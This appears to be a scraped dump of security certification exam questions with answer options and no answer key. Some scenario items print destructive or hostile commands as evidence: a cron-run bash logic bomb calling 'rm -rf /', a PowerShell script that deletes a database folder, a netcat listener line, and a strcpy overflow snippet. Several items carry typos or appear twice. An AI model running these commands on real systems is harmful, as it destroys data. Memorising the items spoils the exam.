Multiple organizations operating in the same vertical want to provide seamless wireless access for their
employees as they visit the other organizations. Which of the following should be implemented if all the
organizations use the native 802.1x client on their mobile devices? Shibboleth RADIUS federation SAML OAuth OpenlD connect.
Upon entering an incorrect password, the logon screen displays a message informing the user that the
password does not match the username provided and is not the required length of 12 characters. Which of the
following secure coding techniques should a security analyst address with the application developers to follow
security best practices? Input validation Error handling Obfuscation Data exposure.
A security administrator is developing controls for creating audit trails and tracking if a PHI data breach is to
occur. The administrator has been given the following requirements:
*All access must be correlated to a user account.
*All user accounts must be assigned to a single individual.
*User access to the PHI data must be recorded.
*Anomalies in PHI data access must be reported.
*Logs and records cannot be deleted or modified.
Which of the following should the administrator implement to meet the above requirements? (Select THREE). Eliminate shared accounts Create a standard naming convention for accounts. Implement usage auditing and review. Enable account lockout thresholds. Copy logs in real time to a secured WORM drive. Implement time-of-day restrictions. Perform regular permission audits and reviews.
An administrator is replacing a wireless router. The configuration of the old wireless router was not documented
before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment
that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options
should the administrator select for the new wireless router? WPA+CCMP WPA2+CCMP WPA+TKIP WPA2+TKIP.
Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a
market edge and reduce time to market? Competitor Hacktivist Insider Organized crime.
Which of the following BEST describes an important security advantage yielded by implementing vendor
diversity? Sustainability Homogeneity Resiliency Configurability.
Which of the following specifically describes the exploitation of an interactive process to access otherwise
restricted areas of the OS? Pivoting Process affinity Buffer overflow XSS.
Which of the following differentiates a collision attack from a rainbow table attack? A rainbow table attack performs a hash lookup. A rainbow table attack uses the hash as a password. In a collision attack, the hash and the input data are equivalent. In a collision attack, the same input results in different hashes.
A security analyst observes the following events in the logs of an employee workstation:
1/23 1:07:16 865 Access to C:\Users\user\temp\oasdfkh.hta has been restricted by your
administrator by the default restriction policy level.
1/23 1:07:09 1034 The scan is completed. No detections were found.
The security analyst reviews the file system and observes the following:
C:\> dir
C:\Users\user\temp
1/23 1:07:02 oasdfkh.hta
1/23 1:07:02 update.bat
1/23 1:07:02 msg.txt
Given the information provided, which of the following MOST likely occurred on the workstation? Application whitelisting controls blocked an exploit payload from executing. Antivirus software found and quarantined three malware files. Automatic updates were initiated but failed because they had not been approved. The SIEM log aged was not tuned properly and reported a false positive.
A security technician has been receiving alerts from several servers that indicate load balancers have had a
significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk
space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the
servers has increased. Which of the following is the MOST likely cause of the decreased disk space? Misconfigured devices Logs and events anomalies Authentication issues Unauthorized software.
A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main
culprit of CPU utilization is the antivirus program. Which of the following issue could occur if left unresolved?
(Select TWO) MITM attack DoS attack DLL injection Buffer overflow Resource exhaustion.
Which of the following is used to validate the integrity of data? CBC Blowfish MD5 RSA.
A user typically works remotely over the holidays using a web-based VPN to access corporate resources. The
user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely
the case? The certificate has expired The browser does not support SSL The user's account is locked out The VPN software has reached the seat license maximum.
When it comes to cloud computing, if one of the requirements for a project is to have the most control over the
systems in the cloud, which of the following is a service model that would be BEST suited for this goal? Infrastructure Platform Software Virtualization.
A company was recently audited by a third party. The audit revealed the company's network devices were
transferring files in the clear. Which of the following protocols should the company use to transfer files? HTTPS LDAPS SCP SNMPv3.
A security analyst is acquiring data from a potential network incident. Which of the following evidence is the
analyst MOST likely to obtain to determine the incident? Volatile memory capture Traffic and logs Screenshots System image capture.
A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for
analysis. The analyst notices that an internal host had a socket established with another internal host over a
non-standard port. Upon investigation, the origin host that initiated the socket shows this output:
usera@host>history
mkdir /local/usr/bin/somedirectory
nc -1 192.168.5.1 -p 9856
ping -c 30 8.8.8.8 -a 600
rm /etc/dir2/somefile
rm -rm /etc/dir2/
traceroute 8.8.8.8
pakill pid 9487
usera@host>
Given the above output, which of the following commands would have established the questionable socket? traceroute 8.8.8.8 ping -1 30 8.8.8.8 -a 600 nc -1 192.168.5.1 -p 9856 pskill pid 9487.
A security administrator has written a script that will automatically upload binary and text-based configuration
files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which
of the following should the administrator use? (Select TWO) TOPT SCP FTP over a non-standard pot SNMPv3 Certificate-based authentication.
A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items.
Which of the following BEST describe why this has occurred? (Select TWO) Privileged-user certificated were used to scan the host Non-applicable plug ins were selected in the scan policy The incorrect audit file was used The output of the report contains false positives The target host has been compromised.
Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in
a third-party software application? Sandboxing Encryption Code signing Fuzzing.
A network administrator needs to allocate a new network for the R&D group. The network must not be
accessible from the Internet regardless of the network firewall or other external misconfigurations. Which of the
following settings should the network administrator implement to accomplish this? Configure the OS default TTL to 1 Use NAT on the R&D network Implement a router ACL Enable protected ports on the switch.
To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of
the following practices should be employed? Least privilege Job rotation Background checks Separation of duties.
When attackers use a compromised host as a platform for launching attacks deeper into a company's network,
it is said that they are: escalating privilege becoming persistent fingerprinting pivoting.
The help desk received a call after hours from an employee who was attempting to log into the payroll server
remotely. When the help desk returned the call the next morning, the employee was able to log into the server
remotely without incident. However, the incident occurred again the next evening. Which of the following BEST
describes the cause of the issue? The password expired on the account and needed to be reset The employee does not have the rights needed to access the database remotely Time-of-day restrictions prevented the account from logging in The employee's account was locked out and needed to be unlocked.
An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned
network can be seen sending packets to the wrong gateway. Which of the following network devices is
misconfigured and which of the following should be done to remediate the issue? Firewall; implement an ACL on the interface Router; place the correct subnet on the interface Switch; modify the access port to trunk port Proxy; add the correct transparent interface.
A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFienabled
baby monitor while the baby's parents were sleeping. Which of the following BEST describes how the
intruder accessed the monitor? Outdated antivirus WiFi signal strength Social engineering Default configuration.
A security engineer must install the same x.509 certificate on three different servers. The client application that
connects to the server performs a check to ensure the certificate matches the host name. Which of the
following should the security engineer use? Wildcard certificate Extended validation certificate Certificate chaining Certificate utilizing the SAN file.
Which of the following refers to the term used to restore a system to its operational state? MTBF MTTR RTO RPO.
A Chief Information Officer (CIO) recently saw on the news that a significant security flaws exists with a specific
version of a technology the company uses to support many critical application. The CIO wants to know if this
reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which
of the following would BEST provide the needed information? Penetration test Vulnerability scan Active reconnaissance Patching assessment report.
An organization is expanding its network team. Currently, it has local accounts on all network devices, but with
growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for
the organization? (Sect TWO) TACACS+ CHAP LDAP RADIUS MSCHAPv2.
An active/passive configuration has an impact on: confidentiality integrity availability non-repudiation.
Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML
iframe with JavaScript code via a web browser? Buffer overflow MITM XSS SQLi.
Which of the following would provide additional security by adding another factor to a smart card? Token Proximity badge Physical key PIN.
Which of the following uses precomputed hashes to guess passwords? IPTables NAT tables Rainbow tables ARP tables.
A systems administrator wants to provide balance between the security of a wireless network and usability. The
administrator is concerned with wireless encryption compatibility of older devices used by some employees.
Which of the following would provide strong security backward compatibility when accessing the wireless
network? Open wireless network and SSL VPN WPA using a preshared key WAP2 using a RADIUS back-end for 802.1x authentication WEP with a 40-bit key.
In determining when it may be necessary to perform a credentialed scan against a system instead of a noncredentialed
scan, which of the following requirements is MOST likely to influence its decisions? The scanner must be able to enumerate the host OS of devices scanner The scanner must be able to footprint the network The scanner must be able to check for open ports with listening services The scanner must be able to audit file system permissions.
A security administrator receives an alert from a third-party vendor that indicates a certificate that was installed
in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at
least four different browsers in use on more than a thousand computers in the domain worldwide. Which of the
following solutions would be BEST for the security administrator to implement to most efficiently assist with this
issue? SSL CRL PKI ACL.
After a user reports slow computer performance, a systems administrator detects a suspicious file, which was
installed as part of a freeware software package. The systems administrator reviews the output below:
c:\Windows\system32>netstat -nab
Active Connections
Pronto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0 RpcSs [svchoat.exe]
TCP 0.0.0.0:445 0.0.0.0 [svchost.exe]
TCP 192.168.1.10:5000 10.37.213.20 winserver.exe
UDP 192.168.1.10:1900 *.* SSDPSVR
Based on the above information, which of the following types of malware was installed on the user's computer? RAT Keylogger Spyware Worm Bot.
A company has noticed multiple instances of proprietary information on public websites. It has also observed an
increase in the number of email messages sent to random employees containing malicious links and PDFs.
Which of the following changes should the company make to reduce the risks associated with phishing
attacks? (Select TWO) Install an additional firewall Implement a redundant email server Block access to personal email on corporate systems Update the X.509 certificates on the corporate email server Update corporate policy to prohibit access to social media websites Review access violation on the file server.
A security analyst is investigating a potential breach. Upon gathering, documenting, and securing the evidence,
which of the following actions is the NEXT step to minimize the business impact? Launch an investigation to identify the attacking host Initiate the incident response plan Review lessons learned captured in the process Remove malware and restore the system to normal operation.
Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a
flight, Joe, decides to connect to the airport wireless network without connecting to a VPN,and the sends
confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon
investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused
the data breach? Policy violation Social engineering Insider threat Zero-day attack.
An information security specialist is reviewing the following output from a Linux server:
user@server:~$ -l
5 * * * * /usr/local/bin.backup.sh
user@server:~$ cat /usr/local/bin/backup.sh
#!/bin/bash
if ! grep --quiet joeuser /etc/passwd
the rm -rf /
fi
Based on the above information, which of the following types of malware was installed on the server? Logic bomb Trojan Backdoor Ransomware Rootkit.
A company wants to ensure confidential data from storage media is sanitized in such a way that the drive
cannot be reused. Which of the following method should the technician use? Shredding Wiping Low-level formatting Repartitioning Overwriting.
A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of
the following is the FIRST step the forensic expert needs to take the chain of custody? Make a forensic copy Create a hash of the hard drive Recover the hard drive data Update the evidence log.
An incident response manager has started to gather all the facts related to a SIEM alert showing multiple
systems may have been compromised. The manager has gathered these facts:
The breach is currently indicated on six user PCs
One service account is potentially compromised
Executive management has been notified
In which of the following phases of the IRP is the manager currently working? Recovery Eradication Containment Identification.
A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site
is a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away, the company wants to
ensure its business is always operational with the least amount of man hours needed. Which of the following
types of disaster recovery sites should the company implement? Hot site Warm site Cold site Cloud-based site.
A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the
domain controller, the systems administrator needs to provide the domain administrator credentials. Which of
the following account types is the system administrator using? Shared accounts Guest account Service account User account.
User from two organizations, each with its own PKI, need to begin working together on a joint project. Which of
the following would allow the users of the separate PKIs to work together without connection errors? Trust model Stapling Intermediate CA Key escrow.
A security analyst is migrating a pass-the-hash vulnerability on a Windows infrastructure. Given the
requirement, which of the following should the security analyst do to MINIMIZE the risk? Enable CHAP Disable NTLM Enable Kerberos Disable PAP.
An organization requires users to provide their fingerprints to access an application. To improve security, the
application developers intend to implement multifactor authentication. Which of the following should be
implemented? Use a camera for facial recognition Have users sign their name naturally Require a palm geometry scan Implement iris recognition.
A security analyst is reviewing an assessment report that includes software versions, running services,
supported encryption algorithms, and permission settings. Which of the following produced the report? Vulnerability scanner Protocol analyzer Network mapper Web inspector.
A Chief Information Officer (CIO) asks the company's security specialist if the company should spend any funds
on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection
for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE values
warrants a recommendation against purchasing the malware protection? $500 $1000 $2000 $2500.
The computer resource center issue smartphones to all first-level and above managers. The managers
have the ability to install mobile tools. Which of the following tools should be implemented with the
type of tools the managers installed?
Download manager Content manager Segmentation manager Application manager.
A systems administrator wants to provide for and enforce wireless access accountability during events where
external speakers are invited to make presentations to a mixed audience of employees and non-employees.
Which of the following should the administrator implement? Shared accounts Preshared passwords Least privilege Sponsored guest.
A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster
they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities
exist? Buffer overflow End-of-life systems System sprawl Weak configuration.
A security administrator has found a hash in the environment known to belong to malware. The administrator
then finds this file to be in the pre-update area of the OS, which indicated it was pushed from the central patch
system.
File: winx86_adobe_upgrade.exe
Hash: 99ac28bede43ab869b853ba62c4ea243
Administrator pulls a report from the patch management system with the following output:
Install Date Package Name Target Device Hash
10/10/2017 java_11.2_x64.exe HQ PC's 01ab28bbde63aa879b35bba62cdea282
10/10/2017 winx86_adobe_flash_upgrade.exe HQ PC's 99ac28bede43ab86b853ba62c4ea243
Given the above output, which of the following MOST likely happened? The file was corrupted after it left the patch system The file was infected when the patch manager downloaded it The file was not approved in the application whitelist system The file was embedded with a logic bomb to evade detection.
Two users must encrypt and transmit large amounts of data between them. Which of the following should they
use to encrypt and transmit the data? Symmetric algorithm Hash function Digital signature Obfuscation.
A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all
employees must have their badges rekeyed at least annually. Which of the following controls BEST describes
this policy? Physical Corrective Technical Administrative.
A software developer is concerned about DLL hijacking in an application being written. Which of the following is
the MOST viable mitigation measure of this type of attack? The DLL of each application should be set individually All calls to different DLLs should be hard-coded in the application Access to DLLs from the Windows registry should be disabled The affected DLLs should be renamed to avoid future hijacking.
A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual
authentication. Which of the following should the engineer implement if the design requires client MAC
addresses to be visible across the tunnel? Tunnel mode IPSec Transport mode VPN IPSec L2TP SSL VPN.
An application was recently compromised after some malformed data came in via web form. Which of the
following would MOST likely have prevented this? Input validation Proxy server Stress testing Encoding.
While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstation
from the original media. Joe is about to begin copying the user's files back onto the hard drive. Which of the
following incident response steps is Joe working on now? Recovery Eradication Containment Identification.
A systems administrator found a suspicious file in the root of the file system. The file contains URLs,
usernames, passwords, and text from other documents being edited on the system. Which of the following
types of malware would generate such a file? Keylogger Rootkit Bot RAT.
A computer emergency response team is called at midnight to investigate a case in which a mail server was
restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active
connection. Which of the following is the NEXT step the team should take? Identify the source of the active connection Perform eradication of active connection and recover Performance containment procedure by disconnecting the server Format the server and restore its initial configuration.
An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a
Windows server. Given the following code:
void foo (char *bar)
{
car random_user_input[12];
stropy (random_user_input, bar);
}
Which of the following vulnerabilities is present? Bad memory pointer Buffer overflow Integer overflow Backdoor.
A company has a data classification system with definitions for "Private" and "Public". the company's security
policy outlines how data should be protected based on type. The company recently added data type
"Proprietary". Which of the following is the MOST likely reason the company added this data type? Reduced cost More searchable data Better data classification Expanded authority of the privacy officer.
A security technician is configuring an access management system to track and record user actions. Which of
the following functions should the technician configure? Accounting Authorization Authentication Identification.
A security administrator installed a new network scanner that identifies new host systems on the network.
Which of the following did the security administrator install? Vulnerability scanner Network-based IDS Rogue system detection Configuration compliance scanner.
A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a known
vulnerability. Which of the following risk responses does this BEST describe? Transference Avoidance Mitigation Acceptance.
An audit takes place after company-wide restructuring, in which several employees changed roles. The
following deficiencies are found during the audit regarding access to confidential data.
Employee Job Function Audit Finding
Ann Sales Manager *Access to confidential payroll shares
*Access to payroll processing program
*Access to marketing shares
Jeff Marketing Director *Access to human resources annual review folder
*Access to shared human resources mailbox
John Sales Manager *Active account
*Access to human resources annual review folder
*Access to confidential payroll shares
Which of the following would be the BEST method to prevent similar audit finding in the future? Implement separation of duties for the payroll department Implement a DLP solution on the payroll and human resources reviews Implement rule-based access controls on the human resources server Implement regular permission auditing and reviews.
A technician is investigating a potentially compromised device with the following symptoms:
Browser slowness
Frequent browser crashes
Hourglass stuck
New search toolbar
Increased memory consumption
Which of the following types of malware has infected the system? Man-in-the-browser Spoofer Spyware Adware.
A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior
to transmission over untrusted media. Which of the following BEST describes the action performed by this type
of application? Hashing Key exchange Encryption Obfuscation.
An audit reported has identified a weakness that could allow unauthorized personnel access to the facility at its
main entrance and from there gain access to the network. Which of the following would BEST resolve the
vulnerability? Faraday cage Air gap Mantrap Bollards.
When attempting to secure a mobile workstation, which of the following authentication technologies rely on the
user's physical characteristics? (Select TWO) MAC address table Retina scan Fingerprint scan Two-factor authentication CAPTCHA Password string.
Systems administrator and key support staff come together to simulate a hypothetical interruption of service.
The team updates the disaster recovery processes and documentation after meeting. Which of the following
describes the team's efforts?
Business impact analysis Continuity of operation Tabletop exercise Order of restoration.
A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in
their browsers when connecting to one of the networks. Both captive portals are using the same server
certificate for authentication, but the analyst notices the following differences between the two certificate details:
Certificate 1
Certificate Path:
Geotrust Global CA
*company.com
Certificate 2
Certificate Path:
*company.com
Which of the following would resolve the problem? Use a wildcard certificate. Use certificate chaining. Use a trust model. Use an extended validation certificate.
Company A has acquired Company B. Company A has different domains spread globally, and typically
migrates its acquisitions infrastructure under its own domain infrastructure. Company B, however, cannot be
merged into Company A's domain infrastructure. Which of the following methods would allow the two
companies to access one another's resources? Attestation Federation Single sign-on Kerberos.
A technician is configuring a load balancer for the application team to accelerate the network performance of
their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario,
which of the following would be the BEST method of configuring the load balancer? Round-robin Weighted Least connection Locality-based.
Ann is the IS manager for several new systems in which the classifications of the systems' data are being
decided. She is trying to determine the sensitivity level of the data being processed. Which of the following
people should she consult to determine the data classification? Steward Custodian User Owner.
An organization's employees currently use three different sets of credentials to access multiple internal
resources. Management wants to make this process less complex. Which of the following would be the BEST
option to meet this goal? Transitive trust Single sign-on Federation Secure token.
An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks
is described? Replay Spoofing DNS poisoning Client-side attack.
A systems administrator has isolated an infected system from the network and terminated the malicious
process from executing. Which of the following should the administrator do NEXT according to the incident
response process? Restore lost data from a backup. Wipe the system. Document the lessons learned. Determine the scope of impact.
A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of
the following types of scans MOST likely caused the outage? Non-intrusive credentialed scan Non-intrusive non-credentialed scan Intrusive credentialed scan Intrusive non-credentialed scan.
A security analyst is hardening a WiFi infrastructure. The primary requirements are the following:
The infrastructure must allow staff to authenticate using the most secure method.
The infrastructure must allow guests to use an "open" WiFi network that logs valid email addresses before
granting access to the Internet.
Given these requirements, which of the following statements BEST represents what the analyst should
recommend and configure? Configure a captive portal for guests and WPS for staff. Configure a captive portal for staff and WPA for guests. Configure a captive portal for staff and WEP for guests. Configure a captive portal for guest and WPA2 Enterprise for staff.
A security administrator is trying to eradicate a worm, which is spreading throughout the organization, using an
old remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the company.
The administrator wants to implement a solution that will eradicate the current worm and any future attacks that
may be using zero-day vulnerabilities. Which of the following would BEST meet the requirements when
implemented? Host-based firewall Enterprise patch management system Network-based intrusion prevention system Application blacklisting File integrity checking.
Which of the following is a deployment concept that can be used to ensure only the required OS access is
exposed to software applications? Staging environment Sandboxing Secure baseline Trusted OS.
A procedure differs from a policy in that it: is a high-level statement regarding the company's position on a topic. sets a minimum expected baseline of behavior. provides step-by-step instructions for performing a task. describes adverse actions when violations occur.
Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann's
access and checks the SIEM for any errors. The security analyst reviews the log file from Ann's system and
notices the following output:
2017--08-21 10:48:12 DROP TCP 172.20.89.232 239.255.255.255 443 1900 250 -------- RECEIVE
2017--08-21 10:48:12 DROP UDP 192.168.72.205 239.255.255.255 443 1900 250 -------- RECEIVE
Which of the following is MOST likely preventing Ann from accessing the application from the desktop? Web application firewall DLP Host-based firewall UTM Network-based firewall.
Which of the following types of penetration test will allow the tester to have access only to password hashes
prior to the penetration test? Black box Gray box Credentialed White box.
Which of the following threats has sufficient knowledge to cause the MOST danger to an organization? Competitors Insiders Hacktivists Script kiddies.
While troubleshooting a client application connecting to the network, the security administrator notices the
following error: Certificate is not valid. Which of the following is the BEST way to check if the digital certificate is
valid? PKI CRL CSR IPSec.
To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO). ARO ROI RPO SLE RTO.
A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount.
On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its
mission objectives. The temporary and contract personnel require access to network resources only when on
the clock. Which of the following account management practices are the BEST ways to manage these
accounts? Employ time-of-day restrictions. Employ password complexity. Employ a random key generator strategy. Employ an account expiration strategy. Employ a password lockout policy.
Which of the following locations contain the MOST volatile data? SSD Paging file RAM Cache memory.
Ann, a customer, is reporting that several important files are missing from her workstation. She recently
received communication from an unknown party who is requesting funds to restore the files. Which of the
following attacks has occurred? Ransomware Keylogger Buffer overflow Rootkit.
Every morning, a systems administrator monitors failed login attempts on the company's log management
server. The administrator notices the DBAdmin account has five failed username and/or password alerts during
a ten-minute window. The systems administrator determines the user account is a dummy account used to
attract attackers. Which of the following techniques should the systems administrator implement? Role-based access control Honeypot Rule-based access control Password cracker.
Joe, a user, has been trying to send Ann, a different user, an encrypted document via email. Ann has not
received the attachment but is able to receive the header information. Which of the following is MOST likely
preventing Ann from receiving the encrypted file? Unencrypted credentials Authentication issues Weak cipher suite Permission issues.
A systems administrator is configuring a system that uses data classification labels. Which of the following will
the administrator need to implement to enforce access control? Discretionary access control Mandatory access control Role-based access control Rule-based access control.
An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of
the following might be identified by the scanner? (Select TWO). The firewall is disabled on workstations. SSH is enabled on servers. Browser homepages have not been customized. Default administrator credentials exist on networking hardware. The OS is only set to check for updates once a day.
A security analyst is reviewing patches on servers. One of the servers is reporting the following error message
in the WSUS management console: The computer has not reported status in 30 days.
Given this scenario, which of the following statements BEST represents the issue with the output above? The computer in question has not pulled the latest ACL policies for the firewall. The computer in question has not pulled the latest GPO policies from the management server. The computer in question has not pulled the latest antivirus definitions from the antivirus program. The computer in question has not pulled the latest application software updates.
Two users must encrypt and transmit large amount of data between them. Which of the following should they
use to encrypt and transmit the data? Symmetric algorithm Hash function Digital signature Obfuscation.
A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a
database server:
$members = GetADGroupMemeber -Identity "Domain Admins" -Recursive | Select -
ExpandProperty name
if ($members -notcontains "JohnDoe"){
Remove-Item -path C:\Database -recurse -force
}
Which of the following did the security administrator discover? Ransomware Backdoor Logic bomb Trojan.
A bank is experiencing a DoS attack against an application designed to handle 500IP-based sessions. in
addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to
prevent a DoS attacks in the future? Deploy multiple web servers and implement a load balancer Increase the capacity of the perimeter router to 10 Gbps Install a firewall at the network to prevent all attacks Use redundancy across all network devices and services.
A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the
following BEST describes the resulting effect? The server will be unable to server clients due to lack of bandwidth The server's firewall will be unable to effectively filter traffic due to the amount of data transmitted The server will crash when trying to reassemble all the fragmented packets The server will exhaust its memory maintaining half-open connections.
A systems administrator is deploying a new mission essential server into a virtual environment. Which of the
following is BEST mitigated by the environment's rapid elasticity characteristic? Data confidentiality breaches VM escape attacks Lack of redundancy Denial of service.
Which of the following is the proper order for logging a user into a system from the first step to the last step? Identification, authentication, authorization Identification, authorization, authentication Authentication, identification, authorization Authentication, authorization, identification Authorization, identification, authentication Authorization, authentication, identification .
A company stores highly sensitive data files used by the accounting system on a server file share. The
accounting system uses a service account named accounting-svc to access the file share. The data is
protected will a full disk encryption, and the permissions are set as follows:
File system permissions: Users = Read Only
Share permission: accounting-svc = Read Only
Given the listed protections are in place and unchanged, to which of the following risks is the data still subject? Exploitation of local console access and removal of data Theft of physical hard drives and a breach of confidentiality Remote exfiltration of data using domain credentials Disclosure of sensitive data to third parties due to excessive share permissions.
A bank uses a wireless network to transmit credit card purchases to a billing system. Which of the following
would be MOST appropriate to protect credit card information from being accessed by unauthorized individuals
outside of the premises? Air gap Infrared detection Faraday cage Protected distributions.
Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a
flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sends
confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon
investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused
the data breach? Policy violation Social engineering Insider threat Zero--day attack.
A help desk technician receives a phone call from an individual claiming to be an employee of the organization
and requesting assistance to access a locked account. The help desk technician asks the individual to provide
proof of identity before access can be granted. Which of the following types of attack is the caller performing? Phishing Shoulder surfing Impersonation Dumpster diving.
Confidential emails from an organization were posted to a website without the organization's knowledge. Upon
investigation, it was determined that the emails were obtained from an internal actor who sniffed the emails in
plain text. Which of the following protocols, if properly implemented, would have MOST likely prevented the
emails from being sniffed? (Select TWO) Secure IMAP DNSSEC S/MIME SMTPS HTTPS.
A company wants to implement an access management solution that allows employees to use the same
usernames and passwords for multiple applications without having to keep multiple credentials synchronized.
Which of the following solutions would BEST meet these requirements? Multifactor authentication SSO Biometrics PKI Federation.
An external auditor visits the human resources department and performs a physical security assessment. The
auditor observed documents on printers that are unclaimed. A closer look at these documents reveals
employee names, addresses, ages, and types of medical and dental coverage options each employee has
selected. Which of the following is the MOST appropriate actions to take? Flip the documents face down so no one knows these documents are PII sensitive Shred the documents and let the owner print the new set Retrieve the documents, label them with a PII cover sheet, and return them to the printer Report to the human resources manager that their personnel are violating a privacy policy.
Which of the following authentication concepts is a gait analysis MOST closely associated? Somewhere you are Something you are Something you do Something you know.
Which of the following metrics are used to calculate the SLE? (Select TWO) ROI ARO ALE MTBF MTTF TCO.
Due to regulatory requirements, server in a global organization must use time synchronization. Which of the
following represents the MOST secure method of time synchronization? The server should connect to external Stratum 0 NTP servers for synchronization The server should connect to internal Stratum 0 NTP servers for synchronization The server should connect to external Stratum 1 NTP servers for synchronization The server should connect to internal Stratum 1 NTP servers for synchronization.
When sending messages using symmetric encryption, which of the following must happen FIRST? Exchange encryption key Establish digital signatures Agree on an encryption method Install digital certificates.
Which of the following scenarios BEST describes an implementation of non-repudiation? A user logs into a domain workstation and access network file shares for another department A user remotely logs into the mail server with another user's credentials A user sends a digitally signed email to the entire finance department about an upcoming meeting A user accesses the workstation registry to make unauthorized changes to enable functionality within
an application.
An office manager found a folder that included documents with various types of data relating to corporate
clients. The office manager notified the data included dates of birth, addresses, and phone numbers for the
clients. The office manager then reported this finding to the security compliance officer. Which of the following
portions of the policy would the security officer need to consult to determine if a breach has occurred? Public Private PHI PII.
Which of the following is an asymmetric function that generates a new and separate key every time it runs? RSA DSA DHE HMAC PBKDF2.
Which of the following would be considered multifactor authentication? Hardware token and smart card Voice recognition and retina scan Strong password and fingerprint PIN and security questions.
Users report the following message appear when browsing to the company's secure site: This website
cannot be trusted. Which of the following actions should a security analyst take to resolve these
messages? (Select TWO) Users report the following message appear when browsing to the company's secure site: This website
cannot be trusted. Which of the following actions should a security analyst take to resolve these
messages? (Select TWO) Ensure the certificate has a .pfx extension on the server Update the root certificate into the client computer certificate store Install the updated private key on the web server Have users clear their browsing history and relaunch the session.
Despite having implemented password policies, users continue to set the same weak passwords and reuse old
passwords. Which of the following technical controls would help prevent these policy violations? Password expiration Password length Password complexity Password history Password lockout.
A security auditor is testing perimeter security in a building that is protected by badge readers. Which of the
following types of attacks would MOST likely gain access? Phishing Man-in-the-middle Tailgating Watering hole Shoulder surfing.
Which of the following encryption methods does PKI typically use to securely protect keys? Elliptic curve Digital signatures Asymmetric Obfuscation.
A department head at a university resigned on the first day of spring semester. It was subsequently determined
that the department head deleted numerous files and directories from the server-based home directory while
the campus was closed. Which of the following policies or procedures could have prevented this form
occurring? Time-of-day restrictions Permissions auditing and review Offboarding Account expiration.
An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently has
500 PCs active on the network. the Chief Information Security Officer (CISO) suggests that the organization
employ desktop imaging technology for such a large-scale upgrade. Which of the following is a security benefit
of implementing an imaging solution? It allows for faster deployment It provides a consistent baseline It reduces the number of vulnerabilities It decreases the boot time.
A senior incident response manager receives a call about some external IPs communicating with internal
computers during off hours. Which of the following types of malware is MOST likely causing this issue? Botnet Ransomware Polymorphic malware Armored virus.
An organization has implemented an IPSec VPN access for remote users. Which of the following IPSec modes
would be the MOST secure for this organization to implement? Tunnel mode Transport mode AH-only mode ESP-only mode.
A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a
requirement for this configuration? Setting up a TACACS+ server Configuring federation between authentication servers Enabling TOTP Deploying certificates to endpoint devices.
Several workstations on a network are found to be on OS versions that are vulnerable to a specific attack.
Which of the following is considered to be a corrective action to combat this vulnerability? Install an antivirus definition patch Educate the workstation users Leverage server isolation Install a vendor-supplied patch Install an intrusion detection system.
A user suspects someone has been accessing a home network without permission by spoofing the MAC
address of an authorized system. While attempting to determine if an unauthorized user is logging into the
home network, the user reviews the wireless router, which shows the following table for systems that are
currently on the home network:
Hostname IP Address MAC MAC Filter
DadPC 192.168.1.15 00:1D:1A:44:17:B5 On
MomPC 192.168.1.15 21:13:D6:C5:42:A2 Off
JuniorPC 192.168.2.16 42:A7:D1:25:11:52 On
Unknown 192.168.1.18 10:B3:22:1A:FF:21 Off
Which of the following should be the NEXT step to determine if there is an unauthorized user on the network? Apply MAC filtering and see if the router drops any of the systems Physically check each of the authorized systems to determine if they are logged onto the network Deny the "unknown" host because the hostname is not known and MAC filtering is not applied to this host Conduct a ping sweep of each of the authorized systems and see if an echo response is received.
